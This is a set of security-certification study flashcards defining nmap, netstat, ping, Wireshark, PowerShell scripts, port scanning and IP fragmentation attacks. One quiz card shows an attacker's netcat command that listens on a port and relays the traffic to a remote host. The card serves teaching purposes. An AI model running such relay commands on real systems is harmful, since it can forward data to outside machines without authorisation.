4.1 Organizational Security Flashcards

1
Q

NMap

A

sends specially crafted packets to the target host(s) and then analyzes the responses to determine the open ports and services running on those hosts. Also, nmap can determine the versions of the applications being used on those ports and services. Nmap is a command-line tool for use on Linux, Windows, and macOS systems

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

NetStat

A

(network statistics) tool is a command-line utility that displays network connections for incoming and outgoing TCP packets, routing tables, and some network interface and network protocol statistics. Still, it cannot identify open ports and services on a host with their version numbers

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Ping

A

tool is used to query another computer on a network to determine whether there is a valid connection

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

WireShark

A

open-source packet analyzer used for network troubleshooting, analysis, software and communications protocol development, and education

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

.ps1

A

If you want to save a series of PowerShell commands in a file to rerun them later, you effectively create a PowerShell script. This is simply a text file with a .ps1 extension. The file contains a series of PowerShell commands, with each command appearing on a separate line

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Port Scanning

A

technique used to identify open ports and services available on a network host

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

IP Fragmentation Attack

A

a common form of denial of service attack, in which the perpetrator overbears a network by exploiting datagram fragmentation mechanisms

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

An attacker has issued the following command: nc -l -p 8080 | nc 192.168.1.76 443. Based on this command, what will occur?

A

Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443

How well did you know this?
1
Not at all
2
3
4
5
Perfectly